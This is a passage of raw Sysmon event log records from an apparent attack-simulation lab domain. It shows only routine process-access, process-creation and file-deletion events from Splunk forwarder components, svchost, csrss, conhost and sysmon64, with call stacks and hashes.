Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.290{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
23542300x80000000000000001049806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468A1C4228B0CC1632B06725C1A605C6,SHA256=198D9F71F4B356CE79D19DFB6D4E5AECEE854A72EFD70C28092D346AD2ED79FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:53.852{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FABAB0E86B11861582684DC3646271C5,SHA256=61CC6BD066FFFA347844E4F23A98E2B4080ACAACAFD132EE6ACD6536A09EDF71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB70BE0A96FFE00B18A0CDD0894E1FD0,SHA256=DD1AD2417AB8C8DF518FD76FCE7A2FB6DDF64DB03C6720663E31FB44F605097C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:53.641{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.620{466BC892-F54D-60EB-527D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.273{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E63263A344D14B617F26506AA77BB74,SHA256=9309364C5A34AA6BA54B9C7A6EC507EDCFA6128F00E3D436B4B161B0593C24A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:53.204{466BC892-F54C-60EB-517D-00000000CF01}87844728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000808032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:54.882{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF9BD60DBD301A46EDFEF9BCE4206E5A,SHA256=D0C26919DE226120631E1411DB09060CEB94964858944EF74B6347B9D2A0AAAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.508{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.492{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.492{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:54.493{466BC892-F54E-60EB-537D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:54.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
